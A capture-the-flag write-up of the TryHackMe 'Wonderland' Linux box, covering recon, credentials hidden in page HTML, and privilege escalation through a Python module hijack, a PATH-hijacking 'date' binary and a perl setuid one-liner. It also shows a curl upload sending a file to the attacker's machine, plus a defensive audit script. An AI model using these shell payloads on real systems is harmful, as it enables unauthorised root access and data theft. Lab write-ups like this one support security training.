Wonderland
A medium Linux box from TryHackMe: gain initial access by finding credentials in the site HTML, then escalate privileges through path-hijacking vulnerabilities and an SUID binary, and finish with root
Recon
Running the standard nmap
sudo nmap -sC -sV -Pn -oA nmap/wonderland 10.10.224.95
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 8e:ee:fb:96:ce:ad:70:dd:05:a9:3b:0d:b0:71:b8:63 (RSA)
| 256 7a:92:79:44:16:4f:20:43:50:a9:a8:47:e2:c2:be:84 (ECDSA)
|_ 256 00:0b:80:44:e6:3d:4b:69:47:92:2c:55:14:7e:2a:c9 (ED25519)
80/tcp open http Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-title: Follow the white rabbit.
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Navigating to the web page shows just a static HTML page
Enumerating the directories with
gobuster dir -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -u 10.10.224.95
This finds a directory, “/r/”
Navigating to it, the page tells you to follow the rabbit, so just try it out and spell out rabbit in the URL
“10.10.224.95/r/a/b/b/i/t/”
This leads to a special page, which tells you to open the door
Inspecting the page source reveals credentials in a hidden paragraph - alice:HowDothTheLittleCrocodileImproveHisShiningTail
<body>
<h1>Open the door and enter wonderland</h1>
<p>"Oh, you’re sure to do that," said the Cat, "if you only walk long enough."</p>
<p>Alice felt that this could not be denied, so she tried another question. "What sort of people live about here?"
</p>
<p>"In that direction,"" the Cat said, waving its right paw round, "lives a Hatter: and in that direction," waving
the other paw, "lives a March Hare. Visit either you like: they’re both mad."</p>
<p style="display: none;">alice:HowDothTheLittleCrocodileImproveHisShiningTail</p>
<img src="/img/alice_door.png" style="height: 50rem;">
</body>
SSH-ing into the box with those credentials gives a shell as alice
ssh alice@10.10.224.95
Exploitation
In the home directory
alice@wonderland:~$ ls -la
drwxr-xr-x 5 alice alice 4096 May 25 2020 .
drwxr-xr-x 6 root root 4096 May 25 2020 ..
lrwxrwxrwx 1 root root 9 May 25 2020 .bash_history -> /dev/null
-rw-r--r-- 1 alice alice 220 May 25 2020 .bash_logout
-rw-r--r-- 1 alice alice 3771 May 25 2020 .bashrc
drwx------ 2 alice alice 4096 May 25 2020 .cache
drwx------ 3 alice alice 4096 May 25 2020 .gnupg
drwxrwxr-x 3 alice alice 4096 May 25 2020 .local
-rw-r--r-- 1 alice alice 807 May 25 2020 .profile
-rw------- 1 root root 66 May 25 2020 root.txt
-rw-r--r-- 1 root root 3577 May 25 2020 walrus_and_the_carpenter.py
Of note is walrus_and_the_carpenter.py; further enumeration with sudo reveals that alice can run this Python file as the “rabbit” user
sudo -l
User alice may run the following commands on wonderland:
(rabbit) /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py
Looking at the Python script, it imports the “random” library and then prints random lines from a set of lines
Looking at the Python module search path by running
alice@wonderland:~$ python3 -c "import sys;print(sys.path)"
['', '/usr/lib/python36.zip', '/usr/lib/python3.6', '/usr/lib/python3.6/lib-dynload', '/usr/local/lib/python3.6/dist-packages', '/usr/lib/python3/dist-packages']
The first item, '', is the current directory, so the script is susceptible to a path-based vulnerability: a file called random.py will be looked for (and loaded from) there first, rather than from /usr/lib/python3.6/ where the real module lives. When a script is run directly, that first entry is the directory containing the script, here /home/alice, which is why the rogue module goes in the home directory.
Creating a file called random.py in the home directory that escalates to a bash shell as the “rabbit” user
import os
os.system("/bin/bash")
Then run the script as the rabbit user with sudo
alice@wonderland:~$ sudo -u rabbit python3.6 /home/alice/walrus_and_the_carpenter.py
rabbit@wonderland:~$ whoami
rabbit
Now as rabbit, there is a “teaParty” file with the SUID bit set in rabbit's home directory
rabbit@wonderland:/home/rabbit$ ./teaParty
Welcome to the tea party!
The Mad Hatter will be here soon.
Probably by Sat, 10 Sep 2022 03:25:27 +0000
Ask very nicely, and I will give you some tea while you wait for him
rabbit@wonderland:/home/rabbit$ ls -la
-rw-r--r-- 1 rabbit rabbit 220 May 25 2020 .bash_logout
-rw-r--r-- 1 rabbit rabbit 3771 May 25 2020 .bashrc
-rw-r--r-- 1 rabbit rabbit 807 May 25 2020 .profile
-rwsr-sr-x 1 root root 16816 May 25 2020 teaParty
Exfiltrate the file with curl's upload (-T) option, which sends it as an HTTP PUT
Start the PUT python server on the kali machine
python3 put-server.py --bind localhost 8000
Then exfiltrate from the victim
curl -T ./teaParty 10.6.107.137:8000
Can disassemble with Ghidra, but I didn't want to download the 1.2Gb, so I just ran strings on the file and hoped for the best
strings ./teaParty
...
The Mad Hatter will be here soon.
/bin/echo -n 'Probably by ' && date --date='next hour' -R
Ask very nicely, and I will give you some tea while you wait for him
...
Can see that to output the message, teaParty runs the command “date” without using its full path - maybe it's susceptible to another PATH vulnerability?
Looking at the PATH variable, you can add /tmp to the beginning of it with
export PATH=/tmp:$PATH
Now we can add a custom “date” binary that gives us a shell as the more privileged user, since it will be found first in the PATH search
On the kali box, create date.c that launches a bash shell
#include <stdlib.h>

/* Replacement "date": when teaParty resolves "date" through PATH and finds
   this in /tmp, it runs a shell instead of printing the time */
int main(void) {
    system("/bin/bash");
    return 0;
}
Then compile
gcc date.c -o date
And then transfer the file to the victim and into the /tmp folder
Then run the teaParty executable to get a shell as “hatter”
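Added example (not code from the writeup or the box): a small Python audit that mimics strings and flags embedded command lines whose commands are not invoked by absolute path, run over constructed bytes modelled on the teaParty strings above, with a fixed variant beside it.

```python
import re
from typing import Dict, List

# Minimal stand-in for `strings`: runs of at least 4 printable ASCII bytes.
_PRINTABLE = re.compile(rb"[\x20-\x7e]{4,}")
# Operators that start a new simple command inside one shell string.
_SEPARATOR = re.compile(r"&&|\|\||;|\|")


def strings(blob: bytes) -> List[str]:
    return [m.group().decode("ascii") for m in _PRINTABLE.finditer(blob)]

def relative_commands(shell_line: str) -> List[str]:
    """Command names in a shell string that are not absolute paths and so get
    resolved through whatever PATH the caller controls. Heuristic only:
    operators inside quotes are not understood."""
    found = []
    for segment in _SEPARATOR.split(shell_line):
        tokens = segment.split()
        # skip leading VAR=value assignments such as LC_ALL=C
        while tokens and re.fullmatch(r"[A-Za-z_]\w*=.*", tokens[0]):
            tokens.pop(0)
        if tokens and not tokens[0].startswith("/"):
            found.append(tokens[0])
    return found

def looks_like_shell(s: str) -> bool:
    """Treat only strings that chain commands or start with a /bin or /usr
    path as candidate command lines; ordinary messages are skipped."""
    return bool(_SEPARATOR.search(s)) or s.startswith(("/bin/", "/usr/"))

def audit(blob: bytes) -> Dict[str, List[str]]:
    """Map each embedded command line to the relative command names it uses."""
    return {s: relative_commands(s) for s in strings(blob)
            if looks_like_shell(s) and relative_commands(s)}

# Constructed bytes modelled on the strings the writeup pulled from teaParty;
# the leading bytes only imitate an ELF header, this is not a real binary.
TEA_PARTY = (b"\x7fELF\x02\x01\x01" + b"\x00" * 9
             + b"Welcome to the tea party!\x00The Mad Hatter will be here soon.\x00"
             b"/bin/echo -n 'Probably by ' && date --date='next hour' -R\x00"
             b"Ask very nicely, and I will give you some tea while you wait for him\x00")

# The same strings after the obvious fix: every command invoked by full path.
TEA_PARTY_FIXED = TEA_PARTY.replace(b"&& date ", b"&& /bin/date ")

if __name__ == "__main__":
    print(audit(TEA_PARTY))        # {"/bin/echo -n 'Probably by ' && date --date='next hour' -R": ['date']}
    print(audit(TEA_PARTY_FIXED))  # {}
```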
Inside hatter's home directory is a password.txt file, unfortunately only containing the password of the “hatter” user
WhyIsARavenLikeAWritingDesk?
SSH in as hatter with that password
Enumerating again from the beginning, see that this user can run perl, which has the setuid capability (cap_setuid) set
hatter@wonderland:/home/hatter$ getcap -r / 2>/dev/null
/usr/bin/perl5.26.1 = cap_setuid+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/perl = cap_setuid+ep
Using GTFOBins, there is a copy-paste solution to exploit the setuid capability
perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
And get root!